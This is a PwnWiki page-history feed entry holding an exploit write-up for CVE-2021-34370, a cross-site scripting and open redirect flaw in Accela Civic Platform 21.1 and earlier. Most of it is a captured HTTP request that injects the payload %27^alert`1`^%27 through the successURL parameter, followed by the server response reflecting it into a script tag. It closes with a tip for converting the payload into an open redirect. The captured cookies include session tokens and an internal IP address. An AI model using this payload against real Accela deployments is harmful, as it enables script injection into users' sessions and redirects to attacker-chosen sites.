https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2021-34370_Accela_Civic_Platform_21.1_XSS%E6%BC%8F%E6%B4%9E 2026-04-15T04:31:29Z Revision history for this page on the wiki MediaWiki 1.35.1 https://pwnwiki.com/index.php?title=CVE-2021-34370_Accela_Civic_Platform_21.1_XSS%E6%BC%8F%E6%B4%9E&diff=5043&oldid=prev 2021-06-15T01:16:02Z

<p>Created page with &quot;&lt;pre&gt; # Exploit Title: Accela Civic Platform 21.1 - &#039;successURL&#039; Cross-Site-Scripting (XSS) # Software Link: https://www.accela.com/civic-platform/ # Version: &lt;= 21.1 # Author...&quot;</p> <p><b>New page</b></p><div>&lt;pre&gt;<br /> # Exploit Title: Accela Civic Platform 21.1 - 'successURL' Cross-Site-Scripting (XSS)<br /> # Software Link: https://www.accela.com/civic-platform/<br /> # Version: &lt;= 21.1<br /> # Author: Abdulazeez Alaseeri<br /> # Tested on: JBoss server/windows<br /> # Type: Web App<br /> # Date: 07/06/2021<br /> # CVE-2021-34370<br /> <br /> <br /> <br /> ================================================================<br /> Accela Civic Platform Cross-Site-Scripting and Open Redirect &lt;= 21.1<br /> ================================================================<br /> <br /> <br /> ================================================================<br /> Request Heeaders start<br /> ================================================================<br /> <br /> GET /ssoAdapter/logoutAction.do?servProvCode=SAFVC&amp;successURL=%27^alert`1`^%27 HTTP/1.1<br /> <br /> Host: Hidden<br /> <br /> Cookie: JSESSIONID=bjmCs2TMr3RzVGT28iJafk0vRpZcd2uO0QVlR7K9.civpnode; BIGipServerAccela_Automation_av.web_pool_PROD=1360578058.47873.0000; LASTEST_REQUEST_TIME=1623056446126; LATEST_LB=1360578058.47873.0000; LATEST_SESSION_ID=xWGsssz3eS1biQdST9lnfkxyMMUp2q3HLR75bGaX; LATEST_WEB_SERVER=10.198.24.82; UUID=35e180c4-bde4-48e3-876f-0f32c6e85d5c; JSESSIONID=***************************; g_current_language_ext=en_US; hostSignOn=true<br /> <br /> User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br /> <br /> Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br /> <br /> Accept-Language: en-US,en;q=0.5<br /> <br /> Accept-Encoding: gzip, deflate<br /> <br /> Upgrade-Insecure-Requests: 1<br /> <br /> Te: trailers<br /> <br /> Connection: close<br /> <br /> ================================================================<br /> Request Heeaders end<br /> ================================================================<br /> <br /> <br /> <br /> ================================================================<br /> Response Heeaders start<br /> ================================================================<br /> HTTP/1.1 200 OK<br /> <br /> Connection: close<br /> <br /> Set-Cookie: JSESSIONID=8qVANwRg4mQWxQ6vAuZOxtv7OEhEMbEXJdc2CzTY.civpnode; path=/ssoAdapter<br /> <br /> X-XSS-Protection: 0<br /> <br /> Content-Type: text/html;charset=ISO-8859-1<br /> <br /> Content-Length: 73<br /> <br /> Date: Tue, 08 Jun 2021 10:41:59 GMT<br /> <br /> <br /> <br /> &lt;script type='text/javascript'&gt;document.location=''^alert`1`^''&lt;/script&gt;<br /> <br /> ================================================================<br /> Response Heeaders end<br /> ================================================================<br /> <br /> Payload: %27^alert`1`^%27<br /> <br /> for open redirect, replace the payload to a valid website.<br /> &lt;/pre&gt;</div>

Pwnwiki